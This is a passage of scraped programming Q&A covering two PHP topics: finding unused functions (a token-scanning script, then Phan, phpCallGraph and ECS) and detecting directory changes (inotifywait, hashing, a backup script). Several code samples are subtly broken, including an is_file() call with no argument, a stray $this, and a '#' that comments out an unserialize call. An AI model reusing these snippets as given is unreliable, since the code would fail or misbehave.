// For every defined function, retain the file and line
// location where that function is defined. Since different
// modules can define a functions with the same name,
// we retain multiple definition locations for each function name.
$function_name = safe_arr($next_token, 1, false);
$line = safe_arr($next_token, 2, false);
if ( $function_name && $line )
{
$function_name = trim($function_name);
if ( $function_name != "" )
{
$defined_functions[$function_name][] = array('file' => $file, 'line' => $line);
}
}
}
}
}
}
}
// We now have a collection of defined functions and
// their definition locations. Go through the tokens again,
// and find 'uses' of the function names.
foreach ( $tokenized as $file => $tokens )
{
foreach ( $tokens as $token )
{
if ( is_array($token) && safe_arr($token, 0) == T_STRING )
{
$function_name = safe_arr($token, 1, false);
$function_line = safe_arr($token, 2, false);;
if ( $function_name && $function_line )
{
$locations_of_defined_function = safe_arr($defined_functions, $function_name, false);
if ( $locations_of_defined_function )
{
$found_function_definition = false;
foreach ( $locations_of_defined_function as $location_of_defined_function )
{
$function_defined_in_file = $location_of_defined_function['file'];
$function_defined_on_line = $location_of_defined_function['line'];
if ( $function_defined_in_file == $file &&
$function_defined_on_line == $function_line )
{
$found_function_definition = true;
break;
}
}
if ( !$found_function_definition )
{
// We found usage of the function name in a context
// that is not the definition of that function.
// Consider the function as 'used'.
unset($defined_functions[$function_name]);
}
}
}
}
}
}
print_report($defined_functions);
exit;
// ============================================================================
function php_files($path)
{
// Get a listing of all the .php files contained within the $path
// directory and its subdirectories.
$matches = array();
$folders = array(rtrim($path, DIRECTORY_SEPARATOR));
while( $folder = array_shift($folders) )
{
$matches = array_merge($matches, glob($folder.DIRECTORY_SEPARATOR."*.php", 0));
$moreFolders = glob($folder.DIRECTORY_SEPARATOR.'*', GLOB_ONLYDIR);
$folders = array_merge($folders, $moreFolders);
}
return $matches;
}
// ============================================================================
function safe_arr($arr, $i, $default = "")
{
return isset($arr[$i]) ? $arr[$i] : $default;
}
// ============================================================================
function tokenize($file)
{
$file_contents = file_get_contents($file);
if ( !$file_contents )
{
return false;
}
$tokens = token_get_all($file_contents);
return ($tokens && count($tokens) > 0) ? $tokens : false;
}
// ============================================================================
function usage()
{
global $argv;
$file = (isset($argv[0])) ? basename($argv[0]) : "find_unused_functions.php";
die("USAGE: $file <root_directory>\n\n");
}
// ============================================================================
function print_report($unused_functions)
{
if ( count($unused_functions) == 0 )
{
echo "No unused functions found.\n";
}
$count = 0;
foreach ( $unused_functions as $function => $locations )
{
foreach ( $locations as $location )
{
echo "'$function' in {$location['file']} on line {$location['line']}\n";
$count++;
}
}
echo "=======================================\n";
echo "Found $count unused function" . (($count == 1) ? '' : 's') . ".\n\n";
}
// ============================================================================
/* EOF */
2020 Update
I have used the other methods outlined above, even the 2019 update answer here is outdated.
Tomáš Votruba's answer led me to find Phan as the ECS route has now been deprecated. Symplify have removed the dead public method checker.
Phan is a static analyzer for PHP
We can utilise Phan to search for dead code. Here are the steps to take using composer to install. These steps are also found on the git repo for phan. These instructions assume you're at the root of your project.
Step 1 - Install Phan w/ composer
composer require phan/phan
Step 2 - Install php-ast
PHP-AST is a requirement for Phan
As I'm using WSL, I've been able to use PECL to install, however, other install methods for php-ast can be found in a git repo
pecl install ast
Step 3 - Locate and edit php.ini to use php-ast
Locate current php.ini
php -i | grep 'php.ini'
Now take that file location and nano (or whichever of your choice to edit this doc). Locate the area of all extensions and ADD the following line:
extension=ast.so
Step 4 - create a config file for Phan
Steps on config file can be found in Phan's documentation on how to create a config file
You'll want to use their sample one as it's a good starting point. Edit the following arrays to add your own paths on both
directory_list & exclude_analysis_directory_list.
Please note that exclude_analysis_directory_list will still be parsed but not validated eg. adding Wordpress directory here would mean, false positives for called wordpress functions in your theme would not appear as it found the function in wordpress but at the same time it'll not validate functions in wordpress' folder.
Mine looked like this
......
'directory_list' => [
'public_html'
],
......
'exclude_analysis_directory_list' => [
'vendor/',
'public_html/app/plugins',
'public_html/app/mu-plugins',
'public_html/admin'
],
......
Step 5 - Run Phan with dead code detection
Now that we've installed phan and ast, configured the folders we wish to parse, it's time to run Phan. We'll be passing an argument to phan --dead-code-detection which is self explanatory.
./vendor/bin/phan --dead-code-detection
This output will need verifying with a fine tooth comb but it's certainly the best place to start
The output will look like this in console
the/path/to/php/file.php:324 PhanUnreferencedPublicMethod Possibly zero references to public method\the\path\to\function::the_funciton()
the/path/to/php/file.php:324 PhanUnreferencedPublicMethod Possibly zero references to public method\the\path\to\function::the_funciton()
the/path/to/php/file.php:324 PhanUnreferencedPublicMethod Possibly zero references to public method\the\path\to\function::the_funciton()
the/path/to/php/file.php:324 PhanUnreferencedPublicMethod Possibly zero references to public method\the\path\to\function::the_funciton()
Please feel free to add to this answer or correct my mistakes :)
If I remember correctly you can use phpCallGraph to do that. It'll generate a nice graph (image) for you with all the methods involved. If a method is not connected to any other, that's a good sign that the method is orphaned.
Here's an example: classGallerySystem.png
The method getKeywordSetOfCategories() is orphaned.
Just by the way, you don't have to take an image -- phpCallGraph can also generate a text file, or a PHP array, etc..
Because PHP functions/methods can be dynamically invoked, there is no programmatic way to know with certainty if a function will never be called.
The only certain way is through manual analysis.
2019+ Update
I got inspied by Andrey's answer and turned this into a coding standard sniff.
The detection is very simple yet powerful:
finds all methods public function someMethod()
then find all method calls ${anything}->someMethod()
and simply reports those public functions that were never called
It helped me to remove over 20+ methods I would have to maintain and test.
3 Steps to Find them
Install ECS:
composer require symplify/easy-coding-standard --dev
Set up ecs.yaml config:
# ecs.yaml
services:
Symplify\CodingStandard\Sniffs\DeadCode\UnusedPublicMethodSniff: ~
Run the command:
vendor/bin/ecs check src
See reported methods and remove those you don't fine useful 👍
You can read more about it here: Remove Dead Public Methods from Your Code
phpxref will identify where functions are called from which would facilitate the analysis - but there's still a certain amount of manual effort involved.
afaik there is no way. To know which functions "are belonging to whom" you would need to execute the system (runtime late binding function lookup).
But Refactoring tools are based on static code analysis. I really like dynamic typed languages, but in my view they are difficult to scale. The lack of safe refactorings in large codebases and dynamic typed languages is a major drawback for maintainability and handling software evolution.
I'm writing a photo gallery script in PHP and have a single directory where the user will store their pictures. I'm attempting to set up page caching and have the cache refresh only if the contents of the directory has changed. I thought I could do this by caching the last modified time of the directory using the filemtime() function and compare it to the current modified time of the directory. However, as I've come to realize, the directory modified time does not change as files are added or removed from that directory (at least on Windows, not sure about Linux machines yet).
So my questions is, what is the simplest way to check if the contents of a directory have been modified?
As already mentioned by others, a better way to solve this would be to trigger a function when particular events happen, that changes the folder.
However, if your server is a unix, you can use inotifywait to watch the directory, and then invoke a PHP script.
Here's a simple example:
#!/bin/sh
inotifywait --recursive --monitor --quiet --event modify,create,delete,move --format '%f' /path/to/directory/to/watch |
while read FILE ; do
php /path/to/trigger.php $FILE
done
See also: http://linux.die.net/man/1/inotifywait
What about touching the directory after a user has submitted his image?
Changelog says: Requires php 5.3 for windows to work, but I think it should work on all other environments
with inotifywait inside php
$watchedDir = 'watch';
$in = popen("inotifywait --monitor --quiet --format '%e %f' --event create,moved_to '$watchedDir'", 'r');
if ($in === false)
throw new Exception ('fail start notify');
while (($line = fgets($in)) !== false)
{
list($event, $file) = explode(' ', rtrim($line, PHP_EOL), 2);
echo "$event $file\n";
}
Uh. I'd simply store the md5 of a directory listing. If the contents change, the md5(directory-listing) will change. You might get the very occasional md5 clash, but I think that chance is tiny enough..
Alternatively, you could store a little file in that directory that contains the "last modified" date. But I'd go with md5.
PS. on second thought, seeing as how you're looking at performance (caching) requesting and hashing the directory listing might not be entirely optimal..
IMO edubem's answer is the way to go, however you can do something like this:
if (sha1(serialize(Map('/path/to/directory/', true))) != /* previous stored hash */)
{
// directory contents has changed
}
Or a more weak / faster version:
if (Size('/path/to/directory/', true) != /* previous stored size */)
{
// directory contents has changed
}
Here are the functions used:
function Map($path, $recursive = false)
{
$result = array();
if (is_dir($path) === true)
{
$path = Path($path);
$files = array_diff(scandir($path), array('.', '..'));
foreach ($files as $file)
{
if (is_dir($path . $file) === true)
{
$result[$file] = ($recursive === true) ? Map($path . $file, $recursive) : $this->Size($path . $file, true);
}
else if (is_file($path . $file) === true)
{
$result[$file] = Size($path . $file);
}
}
}
else if (is_file($path) === true)
{
$result[basename($path)] = Size($path);
}
return $result;
}
function Size($path, $recursive = true)
{
$result = 0;
if (is_dir($path) === true)
{
$path = Path($path);
$files = array_diff(scandir($path), array('.', '..'));
foreach ($files as $file)
{
if (is_dir($path . $file) === true)
{
$result += ($recursive === true) ? Size($path . $file, $recursive) : 0;
}
else if (is_file() === true)
{
$result += sprintf('%u', filesize($path . $file));
}
}
}
else if (is_file($path) === true)
{
$result += sprintf('%u', filesize($path));
}
return $result;
}
function Path($path)
{
if (file_exists($path) === true)
{
$path = rtrim(str_replace('\\', '/', realpath($path)), '/');
if (is_dir($path) === true)
{
$path .= '/';
}
return $path;
}
return false;
}
Here's what you may try. Store all pictures in a single directory (or in /username subdirectories inside it to speed things up and to lessen the stress on the FS) and set up Apache (or whaterver you're using) to serve them as static content with "expires-on" set to 100 years in the future. File names should contain some unique prefix or suffix (timestamp, SHA1 hash of file content, etc), so whenever uses changes the file its name gets changed and Apache will serve a new version, which will get cached along the way.
You're thinking the wrong way.
You should execute your directory indexer script as soon as someone's uploaded a new file and it's moved to the target location.
Try deleting the cached version when a user uploads a file to his directory.
When someone tries to view the gallery, look if there's a cached version first. If there's a cached version, load it, otherwise, generate the page, cache it, done.
I was looking for something similar and I just found this:
http://www.franzone.com/2008/06/05/php-script-to-monitor-ftp-directory-changes/
For me looks like a great solution since I'll have a lot of control (I'll be doing an AJAX call to see if anything changed).
Hope that this helps.
Here is a code sample, that would return 0 if the directory was changed.
I use it in backups.
The changed status is determined by presence of files and their filesizes.
You could easily change this, to compare file contents by replacing
$longString .= filesize($file);
with
$longString .= crc32(file_get_contents($file));
but it will affect execution speed.
#!/usr/bin/php
<?php
$dirName = $argv[1];
$basePath = '/var/www/vhosts/majestichorseporn.com/web/';
$dataFile = './backup_dir_if_changed.dat';
# startup checks
if (!is_writable($dataFile))
die($dataFile . ' is not writable!');
if (!is_dir($basePath . $dirName))
die($basePath . $dirName . ' is not a directory');
$dataFileContent = file_get_contents($dataFile);
$data = #unserialize($dataFileContent);
if ($data === false)
$data = array();
# find all files ang concatenate their sizes to calculate crc32
$files = glob($basePath . $dirName . '/*', GLOB_BRACE);
$longString = '';
foreach ($files as $file) {
$longString .= filesize($file);
}
$longStringHash = crc32($longString);
# do changed check
if (isset ($data[$dirName]) && $data[$dirName] == $longStringHash)
die('Directory did not change.');
# save hash do DB
$data[$dirName] = $longStringHash;
file_put_contents($dataFile, serialize($data));
die('0');